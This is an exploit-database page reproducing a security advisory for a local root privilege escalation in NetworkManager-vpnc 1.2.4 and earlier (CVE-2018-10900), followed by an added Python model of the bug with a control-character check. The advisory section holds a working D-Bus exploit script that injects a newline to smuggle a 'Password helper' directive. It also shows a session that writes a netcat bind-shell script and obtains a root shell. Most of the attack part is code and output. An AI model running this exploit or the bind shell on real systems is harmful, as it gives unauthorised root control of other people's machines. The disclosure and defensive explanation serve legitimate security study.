0day.today - Biggest Exploit Database in the World.
Network Manager VPNC 1.2.4 Privilege Escalation Vulnerability
Security Risk: High
Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
CVE: CVE-2018-10900
Author: Denis Andzakovic
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc
Affected Software: Network Manager VPNC <= 1.2.4 (fixed in 1.2.6, see Timeline)

--[ Description

The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A newline character can be used to inject a "Password helper" parameter into the configuration data passed to vpnc, allowing a local attacker who can add a NetworkManager connection to execute arbitrary commands as root.

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process (running as root) and passes the configuration to it via STDIN as "key value" lines, one directive per line. The plugin does not check the connection's values for newlines, so by injecting a \n character into a configuration parameter an attacker can coerce Network Manager into emitting an extra "Password helper" line pointing at an attacker-controlled executable, which vpnc then runs to obtain the password.

The following Python script creates a VPNC connection over D-Bus that executes /tmp/test when the connection is brought up. The newline is injected into the "Xauth username" parameter.
    #!/usr/bin/env python
    # vpnc_privesc.py - adds a VPNC connection whose "Xauth username" value
    # carries an injected newline followed by a "Password helper" directive.
    import dbus

    con = {
        'vpn': {
            'service-type': 'org.freedesktop.NetworkManager.vpnc',
            'data': {
                'IKE DH Group': 'dh2',
                'IPSec ID': 'testgroup',
                'IPSec gateway': 'gateway',
                'IPSec secret-flags': '4',
                'Local Port': '0',
                'NAT Traversal Mode': 'natt',
                'Perfect Forward Secrecy': 'server',
                'Vendor': 'cisco',
                'Xauth password-flags': '4',
                # The "\n" terminates the "Xauth username" line; the text after
                # it becomes a separate "Password helper" line in the config
                # stream that vpnc reads from STDIN.
                'Xauth username': "username\nPassword helper /tmp/test",
                'ipsec-secret-type': 'unused',
                'xauth-password-type': 'unused'
            }
        },
        'connection': {
            'type': 'vpn',
            'id': 'vpnc_test',
        },
        'ipv4': {'method': 'auto'},
        'ipv6': {'method': 'auto'}
    }

    # Add the connection through NetworkManager's system D-Bus API as an
    # ordinary (unprivileged) user; NetworkManager itself runs as root.
    bus = dbus.SystemBus()
    proxy = bus.get_object("org.freedesktop.NetworkManager",
                           "/org/freedesktop/NetworkManager/Settings")
    settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
    settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialised (note the injected "Password helper" line directly after "Xauth username"):

    Debug 0
    Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
    Cisco UDP Encapsulation Port 0
    Local Port 0
    IKE DH Group dh2
    Perfect Forward Secrecy server
    Xauth username username
    Password helper /tmp/test
    IPSec gateway gateway
    IPSec ID testgroup
    Vendor cisco
    NAT Traversal Mode natt

The following session shows the complete privilege escalation attack. The password helper is a shell script that binds a shell to TCP port 8080; bringing the connection up as an unprivileged user makes vpnc (running as root) execute it:

    doi@ubuntu:~$ cat << EOF > /tmp/test
    > #!/bin/bash
    > mkfifo pipe
    > nc -k -l -p 8080 < pipe | /bin/bash > pipe
    > EOF
    doi@ubuntu:~$ python vpnc_privesc.py
    doi@ubuntu:~$ nmcli connection
    NAME                UUID                                  TYPE      DEVICE
    Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
    vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
    doi@ubuntu:~$ nmcli connection up vpnc_test
    ^Z
    [1]+  Stopped                 nmcli connection up vpnc_test
    doi@ubuntu:~$ nc -vv 127.0.0.1 8080
    Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
    id
    uid=0(root) gid=0(root) groups=0(root)

--[ Timeline

11/07/2018 - Advisory sent to security@gnome.org
13/07/2018 - Acknowledgement from GNOME security
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[ About Pulse Security

Pulse Security is a specialist offensive security consultancy dedicated to providing best-in-breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz

# 0day.today [2024-11-16] #
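The newline injection described in the Privilege Escalation section above comes down to a writer that emits "key value" lines without checking the values and a reader that treats every line as a directive. The following is an added example, written for this page and not code from the Pulse Security advisory or from the NetworkManager-vpnc project: it models both sides in Python, shows the injected "Password helper" directive appearing in the parsed result, and adds the control-character check the plugin needed at the trust boundary. The function names, the KNOWN_KEYS subset and the sample values are assumptions for illustration; the check is the shape an editor would expect, not a copy of the fix shipped in 1.2.6.

```python
"""Added example, not code from the Pulse Security advisory or from the
NetworkManager-vpnc project.  It models the bug class the advisory describes:
a writer that emits "key value" lines to vpnc's stdin without checking the
values, a line-oriented reader, and the checked writer the plugin needed.
Function names, KNOWN_KEYS and the sample values are assumptions made for
this illustration, not the project's real names or its full option list."""


# A subset of vpnc directive names (assumed for the model; the real list lives
# in vpnc's config parser).  Directive names contain spaces, so a reader has to
# match on the whole name rather than split on the first space.
KNOWN_KEYS = (
    "IPSec gateway",
    "IPSec ID",
    "Xauth username",
    "Xauth password",
    "Password helper",
    "Script",
    "Debug",
)

# Constructed sample: what an unprivileged user hands NetworkManager over D-Bus.
# The "Xauth username" value carries the injected newline from the advisory.
SAMPLE_VALUES = {
    "IPSec gateway": "gateway",
    "IPSec ID": "testgroup",
    "Xauth username": "username\nPassword helper /tmp/test",
}


def serialize_config(values):
    """Vulnerable writer: one 'key value' line per entry, values unchecked.
    A newline inside a value therefore starts a fresh line, i.e. a fresh
    directive, in the stream the child process reads."""
    return "".join("%s %s\n" % (key, value) for key, value in values.items())


def parse_config(text):
    """Line-oriented reader modelled on how vpnc consumes its stdin config:
    each line is matched against the known directive names and the remainder
    of the line is the value.  A later line overwrites an earlier one for the
    same directive."""
    parsed = {}
    for line in text.splitlines():
        for key in KNOWN_KEYS:
            if line.startswith(key + " "):
                parsed[key] = line[len(key) + 1:]
                break
    return parsed


def serialize_config_checked(values):
    """Hardened writer: refuse any value containing a control character (CR,
    LF, NUL, DEL, ...) so a value can never terminate its own line.  This is
    the check the writer needs before untrusted values reach the stream; it is
    a model, not the actual NetworkManager-vpnc 1.2.6 patch."""
    for key, value in values.items():
        if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
            raise ValueError("control character in value for %r" % key)
    return serialize_config(values)


def injected_helper(values):
    """Return the 'Password helper' directive vpnc would see after the
    vulnerable writer serialises ``values``, or None if none was injected."""
    return parse_config(serialize_config(values)).get("Password helper")


if __name__ == "__main__":
    print(serialize_config(SAMPLE_VALUES))
    print("vpnc would run as Password helper:", injected_helper(SAMPLE_VALUES))
    try:
        serialize_config_checked(SAMPLE_VALUES)
    except ValueError as err:
        print("checked writer rejected it:", err)
```

Run stand-alone, the script prints the two-line stream for "Xauth username" (the username line followed by the smuggled "Password helper /tmp/test" line), reports "/tmp/test" as the helper vpnc would execute, and shows the checked writer refusing the same input. The same reasoning applies to any "key value" or "key: value" text protocol fed to a privileged child process: reject or escape line terminators on the way in, because the reader cannot tell an injected line from a legitimate one.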